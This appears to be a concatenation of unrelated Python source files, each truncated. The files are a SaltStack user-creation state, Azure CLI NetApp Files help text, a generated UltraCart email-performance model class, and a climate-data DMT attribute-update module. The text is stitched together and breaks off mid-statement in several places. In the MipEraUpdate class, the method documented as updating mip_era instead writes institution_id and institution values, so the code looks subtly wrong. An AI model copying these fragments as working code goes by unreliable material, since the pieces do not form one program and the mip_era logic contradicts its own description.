'XXX-REDACTED-XXX' else: ret['changes'][key] = spost[key] if __grains__['kernel'] in ('OpenBSD', 'FreeBSD') and lcpost != lcpre: ret['changes']['loginclass'] = lcpost if ret['changes']: ret['comment'] = 'Updated user {0}'.format(name) changes = _changes(name, uid, gid, groups, present_optgroups, remove_groups, home, createhome, password, enforce_password, empty_password, shell, fullname, roomnumber, workphone, homephone, loginclass, date, mindays, maxdays, inactdays, warndays, expire, win_homedrive, win_profile, win_logonscript, win_description) if changes: ret['comment'] = 'These values 
could not be changed: {0}'.format( changes ) ret['result'] = False return ret if changes is False: # The user is not present, make it! if __opts__['test']: ret['result'] = None ret['comment'] = 'User {0} set to be added'.format(name) return ret if groups and present_optgroups: groups.extend(present_optgroups) elif present_optgroups: groups = present_optgroups[:] # Setup params specific to Linux and Windows to be passed to the # add.user function if not salt.utils.is_windows(): params = {'name': name, 'uid': uid, 'gid': gid, 'groups': groups, 'home': home, 'shell': shell, 'unique': unique, 'system': system, 'fullname': fullname, 'roomnumber': roomnumber, 'workphone': workphone, 'homephone': homephone, 'createhome': createhome, 'nologinit': nologinit, 'loginclass': loginclass} else: params = ({'name': name, 'password': password, 'fullname': fullname, 'description': win_description, 'groups': groups, 'home': home, 'homedrive': win_homedrive, 'profile': win_profile, 'logonscript': win_logonscript}) if __salt__['user.add'](**params): ret['comment'] = 'New user {0} created'.format(name) ret['changes'] = __salt__['user.info'](name) if not createhome: # pwd incorrectly reports presence of home ret['changes']['home'] = '' if 'shadow.info' in __salt__ \ and not salt.utils.is_windows()\ and not salt.utils.is_darwin(): if password and not empty_password: __salt__['shadow.set_password'](name, password) spost = __salt__['shadow.info'](name) if spost['passwd'] != password: ret['comment'] = 'User {0} created but failed to set' \ ' password to' \ ' {1}'.format(name, 'XXX-REDACTED-XXX') ret['result'] = False ret['changes']['password'] = 'XXX-REDACTED-XXX' if empty_password and not password: __salt__['shadow.del_password'](name) spost = __salt__['shadow.info'](name) if spost['passwd'] != '': ret['comment'] = 'User {0} created but failed to ' \ 'empty password'.format(name) ret['result'] = False ret['changes']['password'] = '' if date: __salt__['shadow.set_date'](name, date) spost = 
__salt__['shadow.info'](name) if spost['lstchg'] != date: ret['comment'] = 'User {0} created but failed to set' \ ' last change date to' \ ' {1}'.format(name, date) ret['result'] = False ret['changes']['date'] = date if mindays: __salt__['shadow.set_mindays'](name, mindays) spost = __salt__['shadow.info'](name) if spost['min'] != mindays: ret['comment'] = 'User {0} created but failed to set' \ ' minimum days to' \ ' {1}'.format(name, mindays) ret['result'] = False ret['changes']['mindays'] = mindays if maxdays: __salt__['shadow.set_maxdays'](name, maxdays) spost = __salt__['shadow.info'](name) if spost['max'] != maxdays: ret['comment'] = 'User {0} created but failed to set' \ ' maximum days to' \ ' {1}'.format(name, maxdays) ret['result'] = False ret['changes']['maxdays'] = maxdays if inactdays: __salt__['shadow.set_inactdays'](name, inactdays) spost = __salt__['shadow.info'](name) if spost['inact'] != inactdays: ret['comment'] = 'User {0} created but failed to set' \ ' inactive days to' \ ' {1}'.format(name, inactdays) ret['result'] = False ret['changes']['inactdays'] = inactdays if warndays: __salt__['shadow.set_warndays'](name, warndays) spost = __salt__['shadow.info'](name) if spost['warn'] != warndays: ret['comment'] = 'User {0} created but failed to set' \ ' warn days to' \ ' {1}'.format(name, warndays) ret['result'] = False ret['changes']['warndays'] = warndays if expire: __salt__['shadow.set_expire'](name, expire) spost = __salt__['shadow.info'](name) if spost['expire'] != expire: ret['comment'] = 'User {0} created but failed to set' \ '
<filename>src/netappfiles-preview/azext_netappfiles_preview/_help.py # coding=utf-8 # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from knack.help_files import helps # pylint: disable=line-too-long helps['netappfiles'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Resources. """ # account helps['netappfiles account'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Account Resources. """ helps['netappfiles account create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) account. Note that active directory can only be applied to an existing account (using set/update). parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account examples: - name: Create an ANF account text: > az netappfiles account create -g group --account-name name -l location """ helps['netappfiles account set'] = """ type: command short-summary: Sets the tags or the active directory details for a specified ANF account. Sets the active directory property to exactly what is provided. If none is provided then the active directory is removed, i.e. provide empty []. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. 
Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account set -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 - name: Remove the active directory from the ANF account text: > az netappfiles account set -g group --account-name name --active-directories '[]' -l westus2 """ helps['netappfiles account update'] = """ type: command short-summary: Set/modify the tags or the active directory details for a specified ANF account. Active directory settings are appended only - if none are present no change is made otherwise the active directory is replaced with that provided. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. 
Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account update -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 """ helps['netappfiles account delete'] = """ type: command short-summary: Delete the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Delete an ANF account text: > az netappfiles account delete -g group --account-name name """ helps['netappfiles account list'] = """ type: command short-summary: List ANF accounts. examples: - name: List ANF accounts within a resource group text: > az netappfiles account list -g group """ helps['netappfiles account show'] = """ type: command short-summary: Get the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Get an ANF account text: > az netappfiles account show -g group --account-name name """ # pools helps['netappfiles pool'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Pool Resources. """ helps['netappfiles pool create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) pool. 
parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Create an ANF pool text: > az netappfiles pool create -g group --account-name aname --pool-name pname -l location --size 4398046511104 --service-level "Premium" """ helps['netappfiles pool update'] = """ type: command short-summary: Update the tags of the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Update specific values for an ANF pool text: > az netappfiles pool update -g group --account-name aname --pool-name pname --service-level "Extreme" --tags 'key[=value] key[=value]' """ helps['netappfiles pool delete'] = """ type: command short-summary: Delete the specified ANF pool. 
parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Delete an ANF pool text: > az netappfiles pool delete -g group --account-name aname --pool-name pname """ helps['netappfiles pool list'] = """ type: command short-summary: L:ist the ANF pools for the specified account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: List the pools for the ANF account text: > az netappfiles pool list -g group --account-name name """ helps['netappfiles pool show'] = """ type: command short-summary: Get the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Get an ANF pool text: > az netappfiles pool show -g group --account-name aname --pool-name pname """ # volumes helps['netappfiles volume'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Volume Resources. """ helps['netappfiles volume create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. 
Min 100 GiB, max 100TiB" - name: --creation-token type: string short-summary: A unique file path identifier, from 1 to 80 characters - name: --subnet-id type: string short-summary: The subnet identifier - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A
<reponame>UltraCart/rest_api_v2_sdk_python<gh_stars>1-10 # coding: utf-8 """ UltraCart Rest API V2 UltraCart REST API Version 2 # noqa: E501 OpenAPI spec version: 2.0.0 Contact: <EMAIL> Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class EmailPerformance(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'active_customers': 'int', 'actual_customers': 'int', 'bounce_count': 'int', 'bounce_percentage': 'float', 'bounce_percentage_formatted': 'str', 'customer_histogram': 'EmailPerformanceCustomerHistogram', 'daily_stats': 'list[EmailPerformanceDaily]', 'delivered_count': 'int', 'max_active_customers': 'int', 'max_emails_per_day': 'int', 'max_emails_per_hour': 'int', 'max_emails_per_month': 'int', 'paused_for_spam': 'bool', 'revenue': 'float', 'sent_emails_per_day': 'int', 'sent_emails_per_hour': 'int', 'sent_emails_per_month': 'int', 'sequence_send_count': 'int', 'spam_count': 'int', 'spam_percentage': 'float', 'spam_percentage_formatted': 'str', 'transactional_send_count': 'int' } attribute_map = { 'active_customers': 'active_customers', 'actual_customers': 'actual_customers', 'bounce_count': 'bounce_count', 'bounce_percentage': 'bounce_percentage', 'bounce_percentage_formatted': 'bounce_percentage_formatted', 'customer_histogram': 'customer_histogram', 'daily_stats': 'daily_stats', 'delivered_count': 'delivered_count', 'max_active_customers': 'max_active_customers', 'max_emails_per_day': 'max_emails_per_day', 'max_emails_per_hour': 'max_emails_per_hour', 'max_emails_per_month': 'max_emails_per_month', 'paused_for_spam': 'paused_for_spam', 'revenue': 'revenue', 'sent_emails_per_day': 'sent_emails_per_day', 
'sent_emails_per_hour': 'sent_emails_per_hour', 'sent_emails_per_month': 'sent_emails_per_month', 'sequence_send_count': 'sequence_send_count', 'spam_count': 'spam_count', 'spam_percentage': 'spam_percentage', 'spam_percentage_formatted': 'spam_percentage_formatted', 'transactional_send_count': 'transactional_send_count' } def __init__(self, active_customers=None, actual_customers=None, bounce_count=None, bounce_percentage=None, bounce_percentage_formatted=None, customer_histogram=None, daily_stats=None, delivered_count=None, max_active_customers=None, max_emails_per_day=None, max_emails_per_hour=None, max_emails_per_month=None, paused_for_spam=None, revenue=None, sent_emails_per_day=None, sent_emails_per_hour=None, sent_emails_per_month=None, sequence_send_count=None, spam_count=None, spam_percentage=None, spam_percentage_formatted=None, transactional_send_count=None): # noqa: E501 """EmailPerformance - a model defined in Swagger""" # noqa: E501 self._active_customers = None self._actual_customers = None self._bounce_count = None self._bounce_percentage = None self._bounce_percentage_formatted = None self._customer_histogram = None self._daily_stats = None self._delivered_count = None self._max_active_customers = None self._max_emails_per_day = None self._max_emails_per_hour = None self._max_emails_per_month = None self._paused_for_spam = None self._revenue = None self._sent_emails_per_day = None self._sent_emails_per_hour = None self._sent_emails_per_month = None self._sequence_send_count = None self._spam_count = None self._spam_percentage = None self._spam_percentage_formatted = None self._transactional_send_count = None self.discriminator = None if active_customers is not None: self.active_customers = active_customers if actual_customers is not None: self.actual_customers = actual_customers if bounce_count is not None: self.bounce_count = bounce_count if bounce_percentage is not None: self.bounce_percentage = bounce_percentage if bounce_percentage_formatted is 
not None: self.bounce_percentage_formatted = bounce_percentage_formatted if customer_histogram is not None: self.customer_histogram = customer_histogram if daily_stats is not None: self.daily_stats = daily_stats if delivered_count is not None: self.delivered_count = delivered_count if max_active_customers is not None: self.max_active_customers = max_active_customers if max_emails_per_day is not None: self.max_emails_per_day = max_emails_per_day if max_emails_per_hour is not None: self.max_emails_per_hour = max_emails_per_hour if max_emails_per_month is not None: self.max_emails_per_month = max_emails_per_month if paused_for_spam is not None: self.paused_for_spam = paused_for_spam if revenue is not None: self.revenue = revenue if sent_emails_per_day is not None: self.sent_emails_per_day = sent_emails_per_day if sent_emails_per_hour is not None: self.sent_emails_per_hour = sent_emails_per_hour if sent_emails_per_month is not None: self.sent_emails_per_month = sent_emails_per_month if sequence_send_count is not None: self.sequence_send_count = sequence_send_count if spam_count is not None: self.spam_count = spam_count if spam_percentage is not None: self.spam_percentage = spam_percentage if spam_percentage_formatted is not None: self.spam_percentage_formatted = spam_percentage_formatted if transactional_send_count is not None: self.transactional_send_count = transactional_send_count @property def active_customers(self): """Gets the active_customers of this EmailPerformance. # noqa: E501 Active customers. The value will be -1 if calculation is pending. # noqa: E501 :return: The active_customers of this EmailPerformance. # noqa: E501 :rtype: int """ return self._active_customers @active_customers.setter def active_customers(self, active_customers): """Sets the active_customers of this EmailPerformance. Active customers. The value will be -1 if calculation is pending. # noqa: E501 :param active_customers: The active_customers of this EmailPerformance. 
# noqa: E501 :type: int """ self._active_customers = active_customers @property def actual_customers(self): """Gets the actual_customers of this EmailPerformance. # noqa: E501 Actual customers that they have regardless of active state. The value will be -1 if calculation is pending. # noqa: E501 :return: The actual_customers of this EmailPerformance. # noqa: E501 :rtype: int """ return self._actual_customers @actual_customers.setter def actual_customers(self, actual_customers): """Sets the actual_customers of this EmailPerformance. Actual customers that they have regardless of active state. The value will be -1 if calculation is pending. # noqa: E501 :param actual_customers: The actual_customers of this EmailPerformance. # noqa: E501 :type: int """ self._actual_customers = actual_customers @property def bounce_count(self): """Gets the bounce_count of this EmailPerformance. # noqa: E501 Bounce count # noqa: E501 :return: The bounce_count of this EmailPerformance. # noqa: E501 :rtype: int """ return self._bounce_count @bounce_count.setter def bounce_count(self, bounce_count): """Sets the bounce_count of this EmailPerformance. Bounce count # noqa: E501 :param bounce_count: The bounce_count of this EmailPerformance. # noqa: E501 :type: int """ self._bounce_count = bounce_count @property def bounce_percentage(self): """Gets the bounce_percentage of this EmailPerformance. # noqa: E501 bounce percentage rate based upon our look back window. This should be under five percent or the account will be paused for sending. # noqa: E501 :return: The bounce_percentage of this EmailPerformance. # noqa: E501 :rtype: float """ return self._bounce_percentage @bounce_percentage.setter def bounce_percentage(self, bounce_percentage): """Sets the bounce_percentage of this EmailPerformance. bounce percentage rate based upon our look back window. This should be under five percent or the account will be paused for sending. 
# noqa: E501 :param bounce_percentage: The bounce_percentage of this EmailPerformance. # noqa: E501 :type: float """ self._bounce_percentage = bounce_percentage @property def bounce_percentage_formatted(self): """Gets the bounce_percentage_formatted of this EmailPerformance. # noqa: E501 bounce percentage rate (formatted) based upon our look back window. This should be under five percent or the account will be paused for sending. # noqa: E501 :return: The bounce_percentage_formatted of this EmailPerformance. # noqa: E501 :rtype: str """ return self._bounce_percentage_formatted @bounce_percentage_formatted.setter def bounce_percentage_formatted(self, bounce_percentage_formatted): """Sets the bounce_percentage_formatted of this EmailPerformance. bounce percentage rate (formatted) based upon our look back window. This should be under five percent or the account will be paused for sending. # noqa: E501 :param bounce_percentage_formatted: The bounce_percentage_formatted of this EmailPerformance. # noqa: E501 :type: str """ self._bounce_percentage_formatted = bounce_percentage_formatted @property def customer_histogram(self): """Gets the customer_histogram of this EmailPerformance. # noqa: E501 :return: The customer_histogram of this EmailPerformance. # noqa: E501 :rtype: EmailPerformanceCustomerHistogram """ return self._customer_histogram @customer_histogram.setter def customer_histogram(self, customer_histogram): """Sets the customer_histogram of this EmailPerformance. :param customer_histogram: The customer_histogram of this EmailPerformance. # noqa: E501 :type: EmailPerformanceCustomerHistogram """ self._customer_histogram = customer_histogram @property def daily_stats(self): """Gets the daily_stats of this EmailPerformance. # noqa: E501 Daily statistics used for charting # noqa: E501 :return: The daily_stats of this EmailPerformance. 
# noqa: E501 :rtype: list[EmailPerformanceDaily] """ return self._daily_stats @daily_stats.setter def daily_stats(self, daily_stats): """Sets the daily_stats of this EmailPerformance. Daily statistics used for charting # noqa: E501 :param daily_stats: The daily_stats of this EmailPerformance. # noqa: E501 :type: list[EmailPerformanceDaily] """ self._daily_stats = daily_stats @property def delivered_count(self): """Gets the delivered_count of this EmailPerformance. # noqa: E501 Delivered count # noqa: E501 :return: The delivered_count of this EmailPerformance. # noqa: E501 :rtype: int """ return self._delivered_count @delivered_count.setter def delivered_count(self, delivered_count): """Sets the delivered_count of this EmailPerformance. Delivered count # noqa: E501 :param delivered_count: The delivered_count of this EmailPerformance. # noqa: E501 :type: int """ self._delivered_count = delivered_count @property def max_active_customers(self): """Gets the max_active_customers of this EmailPerformance. # noqa: E501 Maximum active customers allowed under their billing plan # noqa: E501 :return: The max_active_customers of this EmailPerformance. # noqa: E501 :rtype: int """ return self._max_active_customers @max_active_customers.setter def max_active_customers(self, max_active_customers): """Sets the max_active_customers of this EmailPerformance. Maximum active customers allowed under their billing plan # noqa: E501 :param max_active_customers: The max_active_customers of this EmailPerformance. # noqa: E501 :type: int """ self._max_active_customers = max_active_customers @property def max_emails_per_day(self): """Gets the max_emails_per_day of this EmailPerformance. # noqa: E501 Max emails per day # noqa: E501 :return: The max_emails_per_day of this EmailPerformance. # noqa: E501 :rtype: int """ return self._max_emails_per_day @max_emails_per_day.setter def max_emails_per_day(self, max_emails_per_day): """Sets the max_emails_per_day of this EmailPerformance. 
Max emails per day # noqa: E501 :param max_emails_per_day: The max_emails_per_day of this EmailPerformance. # noqa: E501 :type: int """ self._max_emails_per_day = max_emails_per_day @property def max_emails_per_hour(self): """Gets the max_emails_per_hour of this EmailPerformance. # noqa: E501 Max emails per hour # noqa: E501 :return: The max_emails_per_hour of this EmailPerformance. # noqa: E501 :rtype: int """ return self._max_emails_per_hour @max_emails_per_hour.setter def max_emails_per_hour(self, max_emails_per_hour): """Sets the max_emails_per_hour of this EmailPerformance. Max emails per hour # noqa: E501 :param max_emails_per_hour: The
""" attribute_update.py - classes to update the values of files' attributes and keep the files, directory structure and DMT consistent. """ from abc import ABCMeta, abstractmethod import logging import os import re import shutil import six import tempfile from pdata_app.models import (Checksum, ClimateModel, DataRequest, Institute, Project, Settings, TapeChecksum) from pdata_app.utils.common import (adler32, construct_drs_path, construct_filename, get_gws, delete_drs_dir, is_same_gws, run_ncatted, run_ncrename) logger = logging.getLogger(__name__) # The top-level directory to write output data to BASE_OUTPUT_DIR = Settings.get_solo().base_output_dir class AttributeUpdateError(Exception): """ Base class for all custom exceptions """ pass class FileOfflineError(AttributeUpdateError): """ Raised when a file is marked as offline in the DMT """ def __init__(self, directory, filename): message = '{} is offline'.format(os.path.join(directory, filename)) Exception.__init__(self, message) class FileNotOnDiskError(AttributeUpdateError): """ Raised when a file is not found on disk """ def __init__(self, directory, filename): message = '{} was not found on disk'.format(os.path.join(directory, filename)) Exception.__init__(self, message) class SymLinkIsFileError(AttributeUpdateError): """ Raised when a file is found when a symbolic link was expected. """ def __init__(self, filepath): message = ("{} was expected to be a symbolic link but isn't.". format(filepath)) Exception.__init__(self, message) @six.add_metaclass(ABCMeta) class DmtUpdate(object): """ Abstract base class for any updates to files in the DMT. """ def __init__(self, datafile, new_value, update_file_only=False): """ Initialise the class :param pdata_apps.models.DataFile datafile: the file to update :param str new_value: the new value to apply :param bool update_file_only: if true then update just the file and don't make any changes to the database. 
""" self.datafile = datafile self.new_value = new_value self.old_filename = self.datafile.name self.old_directory = self.datafile.directory self.old_sym_link_dir = os.path.join(BASE_OUTPUT_DIR, construct_drs_path(self.datafile)) self.new_filename = None self.new_directory = None self.update_file_only = update_file_only @abstractmethod def update(self): """ Update everything. """ pass def _check_available(self): """ Check that the file is online in the DMT and can be found in its specified location on disk. :raises FileOfflineError: if file does not have a status of online in the DMT. :raises FileNotOnDiskError: if the file is not found on disk. """ if not self.datafile.online: raise FileOfflineError(self.old_directory, self.old_filename) if not os.path.exists(os.path.join(self.old_directory, self.old_filename)): raise FileNotOnDiskError(self.old_directory, self.old_filename) @abstractmethod def _update_file_attribute(self): """ Update the metadata attribute in the file. Assume the file has its original path and name. """ pass def _construct_filename(self): """ Construct the new filename. """ self.new_filename = construct_filename(self.datafile) def _update_filename_in_db(self): """ Update the file's name in the database. """ self.datafile.name = self.new_filename self.datafile.save() def _update_checksum(self): """ Update the checksum and size of the file in the database, preserving the original values. Assume the file has its new path and name. 
""" # Archive the checksum and calculate its new value cs = self.datafile.checksum_set.first() if not cs: logger.warning('No checksum for {}'.format(self.datafile.name)) else: if self.datafile.tapechecksum_set.count() == 0: TapeChecksum.objects.create( data_file=self.datafile, checksum_value=cs.checksum_value, checksum_type=cs.checksum_type ) # Remove the original checksum now that the tape checksum's # been created cs.delete() new_path = os.path.join(self.new_directory, self.new_filename) Checksum.objects.create( data_file=self.datafile, checksum_type='ADLER32', checksum_value=adler32(new_path) ) # Update the file's size if self.datafile.tape_size is None: self.datafile.tape_size = self.datafile.size self.datafile.size = os.path.getsize(new_path) self.datafile.save() def _construct_directory(self): """ Construct the new directory path. """ self.new_directory = os.path.join(get_gws(self.datafile.directory), construct_drs_path(self.datafile)) def _update_directory_in_db(self): """ Update the file's directory. """ self.datafile.directory = self.new_directory self.datafile.save() def _rename_file(self): """ Rename the file on disk and move to its new directory. Update the link from the primary directory. """ if not os.path.exists(self.new_directory): os.makedirs(self.new_directory) os.rename(os.path.join(self.old_directory, self.old_filename), os.path.join(self.new_directory, self.new_filename)) # check for empty directory if not os.listdir(self.old_directory): delete_drs_dir(self.old_directory) # Update the symbolic link if required if not is_same_gws(self.old_directory, BASE_OUTPUT_DIR): old_link_path = os.path.join(self.old_sym_link_dir, self.old_filename) if os.path.lexists(old_link_path): if not os.path.islink(old_link_path): logger.error("{} exists and isn't a symbolic link.". 
                                 format(old_link_path))
                    raise SymLinkIsFileError(old_link_path)
                else:
                    # it is a link so remove it
                    os.remove(old_link_path)
            # check for empty directory
            if not os.listdir(self.old_sym_link_dir):
                delete_drs_dir(self.old_sym_link_dir)
            new_link_dir = os.path.join(BASE_OUTPUT_DIR,
                                        construct_drs_path(self.datafile))
            if not os.path.exists(new_link_dir):
                os.makedirs(new_link_dir)
            os.symlink(os.path.join(self.new_directory, self.new_filename),
                       os.path.join(new_link_dir, self.new_filename))


@six.add_metaclass(ABCMeta)
class DataRequestUpdate(DmtUpdate):
    """
    Abstract base class for updates that require a move of the files to a
    different DataRequest object.
    """
    def __init__(self, datafile, new_value, update_file_only=False):
        """
        Initialise the class

        :param pdata_apps.models.DataFile datafile: the file to update
        :param str new_value: the new value to apply
        :param bool update_file_only: if true then update just the file and
            don't make any changes to the database.
        """
        super(DataRequestUpdate, self).__init__(datafile, new_value,
                                                update_file_only)

        # The name and value of the data_request attribute being modified;
        # concrete subclasses must set both before update() is called.
        self.data_req_attribute_name = None
        self.data_req_attribute_value = None

        # The destination data_request
        self.new_dreq = None

    def update(self):
        """
        Update everything.
        """
        if not self.update_file_only:
            # Default mode of operation. Update the data request and
            # everything. The destination data request is resolved first so
            # that a lookup failure aborts before any changes are made.
            self._find_new_dreq()
            self._check_available()
            self._update_database_attribute()
            self._update_file_attribute()
            self._construct_filename()
            self._update_filename_in_db()
            self._construct_directory()
            self._update_directory_in_db()
            self._rename_file()
            self._update_checksum()
            self._move_dreq()
        else:
            # For when this has been run before and we just need to update
            # files that have been pulled from disk again.
            self.old_filename = self.datafile.incoming_name
            self._check_available()
            self._update_file_attribute()
            self._construct_filename()
            self._construct_directory()
            self._rename_file()
            self._update_checksum()

    def _find_new_dreq(self):
        """
        Find the new data request. If it can't find the data request (or
        there are multiple ones) then Django will raise an exception so that
        we don't make any changes to the files or DB.
        """
        if self.data_req_attribute_name is None:
            raise NotImplementedError("data_req_attribute_name hasn't been "
                                      "set.")
        if self.data_req_attribute_value is None:
            raise NotImplementedError("data_req_attribute_value hasn't been "
                                      "set.")
        # the default values from the existing data request
        dreq_dict = {
            'project': self.datafile.data_request.project,
            'institute': self.datafile.data_request.institute,
            'climate_model': self.datafile.data_request.climate_model,
            'experiment': self.datafile.data_request.experiment,
            'variable_request': self.datafile.data_request.variable_request,
            'rip_code': self.datafile.data_request.rip_code
        }
        # overwrite with the new value
        dreq_dict[self.data_req_attribute_name] = self.data_req_attribute_value
        # find the data request (raises DoesNotExist/MultipleObjectsReturned
        # on failure, which deliberately aborts the whole update)
        self.new_dreq = DataRequest.objects.get(**dreq_dict)

    @abstractmethod
    def _update_database_attribute(self):
        """
        Update the attribute in the database.
        """
        pass

    def _move_dreq(self):
        """
        Move the data file to the new data request
        """
        self.datafile.data_request = self.new_dreq
        self.datafile.save()


class SourceIdUpdate(DataRequestUpdate):
    """
    Update a DataFile's source_id (climate model).
    """
    def __init__(self, datafile, new_value, update_file_only=False):
        """
        Initialise the class

        :param pdata_apps.models.DataFile datafile: the file to update
        :param str new_value: the new source_id (climate model short name)
        :param bool update_file_only: if true then update just the file
        """
        super(SourceIdUpdate, self).__init__(datafile, new_value,
                                             update_file_only)
        self.data_req_attribute_name = 'climate_model'
        self.data_req_attribute_value = ClimateModel.objects.get(
            short_name=self.new_value
        )

    def _update_database_attribute(self):
        """
        Update the source_id
        """
        new_source_id = ClimateModel.objects.get(short_name=self.new_value)
        self.datafile.climate_model = new_source_id
        self.datafile.save()

    def _update_file_attribute(self):
        """
        Update the source_id and make the same change in the
        further_info_url. Assume the file has its original path and name.
        """
        # source_id
        run_ncatted(self.old_directory, self.old_filename,
                    'source_id', 'global', 'c', self.new_value, False)

        # further_info_url (embeds the new source_id as its third component)
        further_info_url = ('https://furtherinfo.es-doc.org/{}.{}.{}.{}.none.'
                            '{}'.format(self.datafile.project.short_name,
                                        self.datafile.institute.short_name,
                                        self.new_value,
                                        self.datafile.experiment.short_name,
                                        self.datafile.rip_code))
        run_ncatted(self.old_directory, self.old_filename,
                    'further_info_url', 'global', 'c', further_info_url,
                    False)


class MipEraUpdate(DataRequestUpdate):
    """
    Update a DataFile's mip_era (project in the DMT).
    """
    def __init__(self, datafile, new_value, update_file_only=False,
                 temp_dir=None):
        """
        Initialise the class

        :param pdata_apps.models.DataFile datafile: the file to update
        :param str new_value: the new mip_era (project short name)
        :param bool update_file_only: if true then update just the file
        :param str temp_dir: if set, edit a copy of the file in this
            directory and copy it back afterwards
        """
        super(MipEraUpdate, self).__init__(datafile, new_value,
                                           update_file_only)
        self.data_req_attribute_name = 'project'
        self.data_req_attribute_value = Project.objects.get(
            short_name=self.new_value
        )
        self.temp_dir = temp_dir

    def _update_database_attribute(self):
        """
        Update the mip_era (project).
        """
        new_mip_era = Project.objects.get(short_name=self.new_value)
        self.datafile.project = new_mip_era
        self.datafile.save()

    def _update_file_attribute(self):
        """
        Update the mip_era and make the same change in the
        further_info_url. Assume the file has its original path and name.
""" if self.temp_dir: orig_path = os.path.join(self.old_directory, self.old_filename) temp_dir = tempfile.mkdtemp(dir=self.temp_dir) temp_path = os.path.join(temp_dir, self.old_filename) shutil.copyfile(orig_path, temp_path) working_dir = temp_dir else: working_dir = self.old_directory # institution_id run_ncatted(working_dir, self.old_filename, 'institution_id', 'global', 'c', self.new_value, False) # institution new_insts = { 'MOHC': 'Met Office Hadley Centre, Fitzroy Road, Exeter, Devon, ' 'EX1 3PB, UK', 'NERC': 'Natural Environment Research Council, STFC-RAL, Harwell, ' 'Oxford, OX11 0QX, UK' } inst = new_insts[self.new_value] run_ncatted(working_dir, self.old_filename, 'institution', 'global', 'c', inst) # further_info_url further_info_url = ( 'https://furtherinfo.es-doc.org/{}.{}.{}.{}.none.{}'. format(self.datafile.project.short_name, self.new_value, self.datafile.climate_model.short_name, self.datafile.experiment.short_name, self.datafile.rip_code)) run_ncatted(working_dir, self.old_filename, 'further_info_url', 'global', 'c', further_info_url) # license license_txt = ( f'CMIP6 model data produced by {self.new_value} is licensed under ' f'a Creative Commons Attribution-ShareAlike 4.0 International ' f'License (https://creativecommons.org/licenses). Consult ' f'https://pcmdi.llnl.gov/CMIP6/TermsOfUse for
